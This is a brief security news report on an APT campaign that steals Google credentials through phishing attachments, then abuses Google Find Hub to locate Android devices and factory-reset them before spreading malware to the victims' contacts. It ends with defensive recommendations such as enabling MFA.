461/68 Wednesday, November 12, 2025
Security researchers have discovered an advanced threat actor (APT) abusing the Google Find Hub (Android’s Find My Device) service to locate victims via GPS and remotely trigger factory resets to erase devices, thereby covering their tracks. After wiping devices, attackers sever victims’ accounts from services-especially messaging apps-and then use the compromised accounts to forward malware to the victim’s contacts.
Researchers found the campaign begins with a phishing email impersonating a trusted organization. When a victim opens an attached .MSI or .ZIP file, it contains an install.bat installation script and a decoy script that shows a fake “language error.” Meanwhile, the malware downloads additional modules from a command-and-control (C2) server, giving the attacker remote control and allowing theft of sensitive credentials such as email account passwords and other online service logins.
Once attackers gain access to the victim’s Google account, they use it to access Find Hub, enumerate Android devices linked to the account, and issue remote factory resets to wipe data. The attackers then use the hijacked account on the infected PC to distribute malicious files to the victim’s contacts. Researchers recommend enabling multi-factor authentication (MFA) on Google accounts, regularly reviewing devices connected to the account, and avoiding opening attachments or downloading software from senders who cannot be directly verified.
